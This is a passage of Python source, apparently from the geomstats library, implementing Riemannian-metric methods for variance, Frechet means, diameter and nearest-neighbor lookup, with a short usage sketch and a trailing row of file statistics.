            base_point = self.mean(points, weights)

        variance = 0.

        sq_dists = self.squared_dist(base_point, points)
        variance += gs.einsum('nk,nj->j', weights, sq_dists)

        variance = gs.array(variance)
        variance /= sum_weights

        variance = gs.to_ndarray(variance, to_ndim=1)
        variance = gs.to_ndarray(variance, to_ndim=2, axis=1)
        return variance
    def mean(self, points,
             weights=None,
             n_max_iterations=32,
             epsilon=EPSILON,
             point_type='vector',
             mean_method='default',
             verbose=False):
        """Frechet mean of (weighted) points.

        Parameters
        ----------
        points : array-like, shape=[n_samples, dimension]
        weights : array-like, shape=[n_samples, 1], optional
        verbose : bool, optional

        Returns
        -------
        mean : array-like
            the Frechet mean of points, a point on the manifold
        """
        if mean_method == 'default':
            # TODO(nina): Profile this code to study performance,
            # i.e. what to do with sq_dists_between_iterates.
            def while_loop_cond(iteration, mean, variance, sq_dist):
                result = ~gs.logical_or(
                    gs.isclose(variance, 0.),
                    gs.less_equal(sq_dist, epsilon * variance))
                return result[0, 0] or iteration == 0

            def while_loop_body(iteration, mean, variance, sq_dist):
                logs = self.log(point=points, base_point=mean)
                tangent_mean = gs.einsum('nk,nj->j', weights, logs)
                tangent_mean /= sum_weights

                mean_next = self.exp(
                    tangent_vec=tangent_mean,
                    base_point=mean)

                sq_dist = self.squared_dist(mean_next, mean)
                sq_dists_between_iterates.append(sq_dist)

                variance = self.variance(points=points,
                                         weights=weights,
                                         base_point=mean_next)

                mean = mean_next
                iteration += 1
                return [iteration, mean, variance, sq_dist]

            if point_type == 'vector':
                points = gs.to_ndarray(points, to_ndim=2)
            if point_type == 'matrix':
                points = gs.to_ndarray(points, to_ndim=3)
            n_points = gs.shape(points)[0]

            if weights is None:
                weights = gs.ones((n_points, 1))

            weights = gs.array(weights)
            weights = gs.to_ndarray(weights, to_ndim=2, axis=1)

            sum_weights = gs.sum(weights)

            mean = points[0]
            if point_type == 'vector':
                mean = gs.to_ndarray(mean, to_ndim=2)
            if point_type == 'matrix':
                mean = gs.to_ndarray(mean, to_ndim=3)

            if n_points == 1:
                return mean

            sq_dists_between_iterates = []
            iteration = 0
            sq_dist = gs.array([[0.]])
            variance = gs.array([[0.]])

            last_iteration, mean, variance, sq_dist = gs.while_loop(
                lambda i, m, v, sq: while_loop_cond(i, m, v, sq),
                lambda i, m, v, sq: while_loop_body(i, m, v, sq),
                loop_vars=[iteration, mean, variance, sq_dist],
                maximum_iterations=n_max_iterations)

            if last_iteration == n_max_iterations:
                print('Maximum number of iterations {} reached. '
                      'The mean may be inaccurate'.format(n_max_iterations))

            if verbose:
                print('n_iter: {}, final variance: {}, final dist: {}'.format(
                    last_iteration, variance, sq_dist))

            mean = gs.to_ndarray(mean, to_ndim=2)
            return mean

        if mean_method == 'frechet-poincare-ball':
            lr = 1e-3
            tau = 5e-3

            if len(points) == 1:
                return points

            iteration = 0
            convergence = math.inf
            barycenter = points.mean(0, keepdims=True) * 0

            while convergence > tau and n_max_iterations > iteration:
                iteration += 1

                expand_barycenter = gs.repeat(barycenter, points.shape[0], 0)
                grad_tangent = 2 * self.log(points, expand_barycenter)
                cc_barycenter = self.exp(lr * grad_tangent.sum(0,
                                                               keepdims=True),
                                         barycenter)

                convergence = self.dist(cc_barycenter, barycenter).max().item()
                barycenter = cc_barycenter

            if iteration == n_max_iterations:
                warnings.warn(
                    'Maximum number of iterations {} reached. The '
                    'mean may be inaccurate'.format(n_max_iterations))
            return barycenter
    def adaptive_gradientdescent_mean(self, points,
                                      weights=None,
                                      n_max_iterations=40,
                                      epsilon=1e-12,
                                      init_points=[],
                                      verbose=False):
        """Compute Frechet mean of (weighted) points using adaptive time-steps.

        Frechet mean of (weighted) points using adaptive time-steps.
        The loss function optimized is ||M_1(x)||_x (where M_1(x) is
        the tangent mean at x) rather than the mean-square-distance (MSD)
        because this saves computation time.

        Parameters
        ----------
        points: array-like, shape=[n_samples, dimension]
        weights: array-like, shape=[n_samples, 1], optional
        init_points: array-like, shape=[n_init, dimension]
        epsilon: tolerance for stopping the gradient descent
        verbose: verbose mode printing the surrogate value
        """
        # TODO(Xavier): This function assumes that all points are lists
        # of vectors and not of matrices
        n_points = gs.shape(points)[0]

        if n_points == 1:
            return gs.to_ndarray(points[0], to_ndim=2)

        if weights is None:
            weights = gs.ones((n_points, 1))

        weights = gs.array(weights)
        weights = gs.to_ndarray(weights, to_ndim=2, axis=1)

        sum_weights = gs.sum(weights)

        n_init = len(init_points)

        if n_init == 0:
            current_mean = points[0]
        else:
            current_mean = init_points[0]

        tau = 1.0
        iteration = 0

        logs = self.log(point=points, base_point=current_mean)
        current_tangent_mean = gs.einsum('nk,nj->j', weights, logs)
        current_tangent_mean /= sum_weights
        norm_current_tangent_mean = gs.linalg.norm(current_tangent_mean)

        while (norm_current_tangent_mean > epsilon
               and iteration < n_max_iterations):
            iteration = iteration + 1

            shooting_vector = gs.to_ndarray(
                tau * current_tangent_mean,
                to_ndim=2)
            next_mean = self.exp(
                tangent_vec=shooting_vector,
                base_point=current_mean)

            logs = self.log(point=points, base_point=next_mean)
            next_tangent_mean = gs.einsum('nk,nj->j', weights, logs)
            next_tangent_mean /= sum_weights
            norm_next_tangent_mean = gs.linalg.norm(next_tangent_mean)

            if verbose:
                print(
                    "Iter {0}: tau= {1}, "
                    "norm_current_tangent_mean = {2}".format(
                        iteration, tau, norm_current_tangent_mean))

            if norm_next_tangent_mean < norm_current_tangent_mean:
                current_mean = next_mean
                current_tangent_mean = next_tangent_mean
                norm_current_tangent_mean = norm_next_tangent_mean
                tau = max(1.0, 1.0511111 * tau)
            else:
                tau = tau * 0.8

        if iteration == n_max_iterations:
            warnings.warn(
                'Maximum number of iterations {} reached. '
                'The mean may be inaccurate'.format(n_max_iterations))

        return gs.to_ndarray(current_mean, to_ndim=2)
    def diameter(self, points):
        """Give the distance between the two farthest points.

        Distance between the two points that are farthest away from each other
        in points.

        Parameters
        ----------
        points

        Returns
        -------
        diameter
        """
        diameter = 0.0
        n_points = points.shape[0]

        for i in range(n_points - 1):
            dist_to_neighbors = self.dist(points[i, :], points[i + 1:, :])
            dist_to_farthest_neighbor = gs.amax(dist_to_neighbors)
            diameter = gs.maximum(diameter, dist_to_farthest_neighbor)

        return diameter

    def closest_neighbor_index(self, point, neighbors):
        """Closest neighbor of point among neighbors.

        Parameters
        ----------
        point
        neighbors

        Returns
        -------
        closest_neighbor_index
        """
        dist = self.dist(point, neighbors)
        closest_neighbor_index = gs.argmin(dist)
        return closest_neighbor_index
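A minimal sketch exercising the class above; EuclideanToy is a hypothetical subclass (not part of the module) supplying an identity inner-product matrix plus flat exp/log, so dist reduces to the Euclidean distance. Runnability depends on the geomstats backend in use:

    class EuclideanToy(RiemannianMetric):
        # Hypothetical flat metric, for illustration only.
        def inner_product_matrix(self, base_point=None):
            return gs.eye(self.dimension)

        def exp(self, tangent_vec, base_point):
            return base_point + tangent_vec  # straight-line geodesics

        def log(self, point, base_point):
            return point - base_point

    metric = EuclideanToy(dimension=2)
    a = gs.array([[1., 0.]])
    b = gs.array([[0., 1.]])
    print(metric.dist(a, b))  # expected [[sqrt(2)]] for the flat metric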
| 33.315789 | 79 | 0.557987 | 2,505 | 21,522 | 4.552495 | 0.120559 | 0.038583 | 0.038057 | 0.040775 | 0.472466 | 0.372939 | 0.334883 | 0.273413 | 0.257804 | 0.215714 | 0 | 0.010714 | 0.349456 | 21,522 | 645 | 80 | 33.367442 | 0.8038 | 0.232599 | 0 | 0.243077 | 0 | 0 | 0.049 | 0.003026 | 0 | 0 | 0 | 0.003101 | 0.012308 | 1 | 0.064615 | false | 0 | 0.015385 | 0 | 0.153846 | 0.009231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |